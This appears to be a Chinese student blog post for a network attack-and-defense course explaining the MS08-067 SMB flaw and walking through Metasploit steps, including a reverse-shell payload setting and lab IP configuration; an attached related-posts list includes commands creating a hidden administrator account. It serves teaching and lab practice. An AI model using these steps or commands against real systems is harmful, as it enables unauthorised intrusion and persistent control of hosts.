20221902 2022-2023-2 《网络攻防实践》第六次作业

已于 2023-04-16 11:32:24 修改
阅读量406 收藏 3
点赞数
分类专栏: 网络攻防 文章标签: 网络 web安全
于 2023-04-15 21:20:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiannvyeye/article/details/130172454
版权

1.知识点梳理与总结

(1)MS08-067

①漏洞描述

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在Windows 2000、Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。

②攻击原理

MS08_067漏洞攻击原理是攻击者利用受害者主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用Server服务的一个函数,并破坏程序的栈缓冲区,获得远程代码执行(Remote Code Execution)权限,从而完全控制主机。

③源码分析

MS08_67漏洞是通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的,而在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化,而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

(2)MSF模块使用详解

  1. msfconsole进入控制台
  2. 确定你要找的漏洞,然后输入search 漏洞名查找相应模块

  1. info查看靶机适用范围

  1. show payloads查看相关载荷
  2. set payload generic/shell_reverse_tcp选择载荷
  3. show options查看相关参数

  1. 进行参数配置
set RHOST 192.168.186.137//靶机IP
set LPORT 5313
set LHOST 192.168.186.128//攻击机IP
set target 0

  1. 利用辅助模块查看端口是否开启(默认端口为445)
msfconsole//进入控制台
search portscan //搜索端口
use auxiliary/scanner/portscan/tcp //使用漏洞模块
set RHOSTS 192.168.186.137 //设置靶机地址
exploit //攻击

  1. exploit侦听

无会话已创建;
猜测是使用的漏洞对XP不起作用。应该是XP版本的问题。

(3)

最低0.47元/天 解锁文章
xiannvyeye
关注
专栏目录
20221902 2022-2023-2 《网络攻防实践》第九次作业
xiannvyeye的博客
05-06 272
objdump -d:对任意一个二进制文件进行反汇编:%!xxd:把二进制文档转成十六进制显示perl -e:指定字符串以作为脚本(多个字符串迭加)执行:管道,把前者的输出作为后者的输入:重定向,将输出内容指向一个指定文件。
20221902 2022-2023-2 《网络攻防实践》第四次作业
xiannvyeye的博客
03-23 577
ARP(Address Resolution Protocol)即地址解析协议,是一种将IP地址转化成物理地址的协议。不管网络层使用什么协议,在网络链路上传送数据帧时,最终还是必须使用硬件地址的。ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表,从而建立错误的IP与MAC对应关系,源主机发送数据时数据便不能被正确地址接收。如果虚假报文的MAC是伪造的不存在的,实现ARP攻击,结果为中断通信/断网!
Kail之MSF渗透测试--MS08-067
m0_57485346的博客
02-13 1572
MS08-067
MS08-067 漏洞利用与安全加固,高级网络安全程序员必会
2301_76190858的博客
04-03 1698
攻击者利用受害者主机默认开发的SMB服务的端口445 发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成可被利用并可远程执行代码。MS08_067 漏洞的全程为 “WIndows Server 服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的RPC请求。则该漏洞可能允许远程执行代码。Ms08_067_netapi 是Metasploit 中的一款溢出攻击载荷。
MS08-067漏洞复现2024,包含环境搭建,流量分析
最新发布
m0_46624929的博客
09-13 1194
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行
MS08-067漏洞复现(Kali+MSF)
JiangDong
06-07 636
MS08-067漏洞复现利用
ms08_067,ms10_046漏洞复现与利用
kunkun_xiaomeng的博客
09-07 1526
ms08_067,ms10_046
E027-操作系统漏洞验证及加固-MS08_067漏洞利用与安全加固
轻舟已过万重山
10-13 890
MS08-067漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。原理MS08-067漏洞是通过MSRPC over SMB通道调用Server程序中的NEtPathCanonicalize函数时触发的。
20221902 2022-2023-2 《网络攻防实践》第三次作业
xiannvyeye的博客
03-17 443
网络嗅探是一种黑客常用的窃听技术,利用计算机的网络接口截获目的地为其他计算机的数据报文,以监听数据流中所包含的用户账户密码或私密信息等。
20221902 2022-2023-2 《网络攻防实践》第八次作业
xiannvyeye的博客
04-27 353
现有的恶意代码变种,在实现上可大致分为两类:一类是基于基础技术的共用,恶意代码开发人员通过重用基础模块实现变种;一类是恶意代码专门针对现有防范技术而设计开发的混淆技术。混淆技术按实现机理,可分为两类:一类是干扰反汇编的混淆,使反汇编无法得到正确结果,从而阻碍进一步分析;另一类是指令/控制流混淆,此类混淆技术通常采用垃圾代码插入、寄存器重分配、等价指令替换及代码变换等方式,改变代码的语法特征,隐藏其内部逻辑关系。
ms08-067漏洞复现
2302_79119987的博客
04-09 1371
漏洞全称是“Windows Server服务RPC请求缓冲区溢出漏洞”,攻击者利用受害者主机默认开放的SMB服务端口445,发送特殊RPC(Remote Procedure Call,远程过程调用)请求,造成栈缓冲区内存错误,从而被利用实施远程代码执行。调用 NetpwPathCanonicalize 函数,对远程访问的路径进行规范化,而在 NetpwPathCanonicalize 函数中存在的逻辑错误,造成栈缓冲区可被溢出。向靶机发送大量数据,造成缓冲区溢出,渗透成功获得权限,使用shell命令。
MS08-067漏洞攻击全程演示(图解).
04-28
MS08-067漏洞攻击全程演示(图解)
MS08-067远程代码执行漏洞复现及相关利用
qq_73277309的博客
03-14 638
攻击机: ip:192.168.136.131 网关:192.168.136.255。目标机: ip:192.168.136.138 网关:192.168.136.2。3、提权:net localgroup administrators root /add。2、在目标机上创建一个新的用户:net user root 123456 /add。攻击机:kali 目标机:win xp。一、验证双方是否可以互相ping通。
Windows域控常见0day及利用漏洞汇集
Ms08067安全实验室
01-10 2884
本文对近几年出现的Windows域控相关漏洞及利用方法进行整理,方便检测存在的漏洞,目前来看主要集中在本地权限提升、打印机服务利用、exchange等。 1.1Kerberos 校验和漏洞MS14-068(CVE-2014-6324) Microsoft Windows Server 2003 SP2、Windows Vista SP2、Windows Server 2008...
MS08-067利用
weixin_60501492的博客
03-21 5422
实验目的 利用Windows平台MS08-067漏洞,成功进行远程命令执行操作,并成功进行3389登录。 用到的端口:445、3389 二、实验环境(虚拟机搭建) 目标:windows xp professional sp3 (我装的是英文版)需要打开445端口,和关闭防火墙 攻击:Kali2022 实验步骤: 获取靶机和kali2022的ip地址,并测试能互相通信 靶机IP地址为:192.168.0.156 Kali2022,IP地址为:192.168.0.125 可以看到成功通信,
网络安全基础之Windows漏洞复现 (MS08-067
weixin_60888404的博客
06-03 2983
本次介绍Windows系统漏洞 MS08-087Windows Server服务 RPC 缓冲区远程溢出漏洞编号 MS08-067MS08_067漏洞渗透攻击原理其原理就是攻击者利用受害者默认开启的SMB服务端口445端口发送恶意的资料到这个端口,通过MSRPC接口调用Server服务的函数,并破坏程序的栈缓冲区,利用远程代码执行权限,从而控制主机前期准备: 靶机:Windows 2003 (未打补丁) 攻击机:kali LinuxMS08_067漏洞渗透攻击过程使用
《Metasploit渗透测试魔鬼训练营》MS08-067 漏洞还原与分析
Flyour的博客
05-05 1929
《Metasploit渗透测试魔鬼训练营》MS08-067 漏洞还原与分析 漏洞还原 按照书上的方法,我们还原这个漏洞,并尝试对win2k3进行渗透。 但是我尝试了好几次才成功,其中有几个小坑,这里给大家提个醒: 要保证win2k3主机的Server服务是开启状态,我的一开始就是关闭状态,导致失败了。 新版的metasploit不需要设置lhost和lport参数,当然你非要设置也可...
MS08_067漏洞复现与总结
马赛克的博客
02-28 6836
00x00 原理:攻击者利用受害主机默认开放的SMB服务端口445,发送恶意资料到该端口,通过MSRPC接口调用server服务的一个函数,并破坏程序的栈缓冲区,获取远程代码执行的权限,从而完全控制主机 安全补丁:KB958644 00x01 #准备工作 两台虚拟机,一台为kali ip:10.10.10.131 一台为Windowsxpsp3英文版 ip:10.10.1...
ms08_067被成功exploit
天元喜羊羊的博客
04-12 5948
昨天用的环境是FC9,exploit失败。我怀疑是xp版本的问题,于是下了xp + sp2的英文版本,然后再用FC9里的metasploit来exploit,还是失败。看到作者用的是backtrack,于是,下载了一个bt4。bt4里面自带了metasploit。这次,exploit成功了。过程如下:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值